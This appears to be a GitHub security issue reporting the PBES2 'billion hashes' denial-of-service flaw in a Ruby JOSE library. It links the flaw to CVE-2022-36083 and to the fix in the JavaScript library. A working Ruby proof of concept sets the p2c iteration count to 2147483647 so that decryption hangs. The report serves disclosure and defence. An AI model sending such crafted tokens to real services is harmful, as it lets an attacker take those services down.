Security: billion hashes attack on PBES2

[rc-mattschwager]

Hi there,

This attack was recently described in a Black Hat 2023 presentation: Three New Attacks Against JSON Web Tokens.

In short, with an attacker controlled p2c value, they can invoke a DoS attack by specifying a very large iteration count. The PBES2-HS256+A128KW, PBES2-HS384+A192KW, and PBES2-HS512+A256KW encryption modes are susceptible to this attack. Here's a demo using the jose library:

require "base64"
require "json"
require "jose"

jwk_secret = JOSE::JWK.from_oct("secret")
jwe = { "alg" => "PBES2-HS256+A128KW", "enc" => "A128GCM" }
encrypted_pbes2hs256a128kw = JOSE::JWE.block_encrypt(jwk_secret, "{}", jwe).compact
puts encrypted_pbes2hs256a128kw

encrytped_fields = encrypted_pbes2hs256a128kw.split(".")
header = Base64.decode64(encrytped_fields.first)
puts header

parsed = JSON.parse(header)
puts parsed["p2c"]

parsed["p2c"] = 2147483647 # PBES2 iteration count
puts parsed["p2c"]

new_header = parsed.to_json
puts new_header

header_64 = Base64.urlsafe_encode64(new_header, padding: false)
new_encrypted_pbes2hs256a128kw = ([header_64] + encrytped_fields[1..-1]).join(".")
puts new_encrypted_pbes2hs256a128kw

puts "Decrypting..."
JOSE::JWE.block_decrypt(jwk_secret, new_encrypted_pbes2hs256a128kw).first

This attack resulted in CVE-2022-36083 in a similar JavaScript JOSE library.

[rc-mattschwager]

Here's how the JS library fixed it: https://github.com/panva/jose/commit/03d6d013bf6e070e85adfe5731f526978e3e8e4d